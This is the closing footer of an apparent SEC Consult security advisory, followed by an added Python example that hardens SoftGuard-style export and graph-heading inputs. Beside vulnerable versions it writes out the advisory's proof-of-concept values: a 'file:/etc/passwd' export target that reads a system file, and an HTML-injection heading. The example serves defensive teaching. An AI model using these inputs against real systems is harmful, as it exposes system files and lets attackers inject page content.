/>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF P. Espernberger / @2022<br /><br /></code></pre>
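The export-target and graph-heading handling from the SoftGuard advisory above, shown as the behaviour the advisory describes beside an input-validated version. This is an added example, not SoftGuard's code; EXPORT_DIR, the function names and the caption layout are assumptions.

```python
"""Hardened handling of the two SoftGuard-style inputs (added example).

  * export target: a `query=file:/etc/passwd` value must not become a readable
    path; only a plain file name inside a fixed export directory is accepted
  * graph heading: the `h` parameter is HTML-encoded before it is placed in
    the <caption> instead of being echoed verbatim
"""
import html
import re
from pathlib import Path
from urllib.parse import unquote

EXPORT_DIR = Path("/var/lib/sgw/exports")  # hypothetical location of export files
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")  # bare file names only


class InvalidExportTarget(ValueError):
    """Raised when the requested export target is not a plain name in EXPORT_DIR."""


def resolve_export_target_vulnerable(query):
    """Mirrors the advisory: a 'file:' prefix makes the rest of the value the path read."""
    if query.startswith("file:"):
        return Path(query[len("file:"):])
    return EXPORT_DIR / query


def resolve_export_target(query, export_dir=EXPORT_DIR):
    """Accept only a bare file name and resolve it inside export_dir."""
    name = unquote(query)  # the PoC encodes ':' as %3a, so validate the decoded value
    if not SAFE_NAME_RE.match(name):  # rejects schemes, '/', '\\', '..' and leading dots
        raise InvalidExportTarget(f"rejected export target {query!r}")
    base = export_dir.resolve()
    candidate = (base / name).resolve()
    if candidate.parent != base:  # second line of defence: nothing may leave export_dir
        raise InvalidExportTarget(f"export target escapes {base}: {query!r}")
    return candidate


def is_safe_export_target(query):
    """True if the hardened resolver accepts the value."""
    try:
        resolve_export_target(query)
    except InvalidExportTarget:
        return False
    return True


def render_caption_vulnerable(heading, count=3, node_id=11212):
    """The advisory's response: the heading parameter lands in the page unchanged."""
    return f"<caption>∑{count}, {heading}, #{node_id}</caption>"


def render_caption(heading, count=3, node_id=11212):
    """Encode the heading so injected tags are rendered as text, not markup."""
    return f"<caption>∑{count}, {html.escape(heading, quote=True)}, #{node_id}</caption>"


if __name__ == "__main__":
    poc_query = "file%3a/etc/passwd'"  # 'query' value from the PoC URL
    poc_heading = unquote("Status%3Ch1%3ESEC-Consult%3C/h1%3E")  # 'h' value from the PoC
    print("vulnerable export reads:", resolve_export_target_vulnerable(unquote(poc_query)))
    print("hardened export accepts PoC value:", is_safe_export_target(poc_query))
    print(render_caption_vulnerable(poc_heading))
    print(render_caption(poc_heading))
```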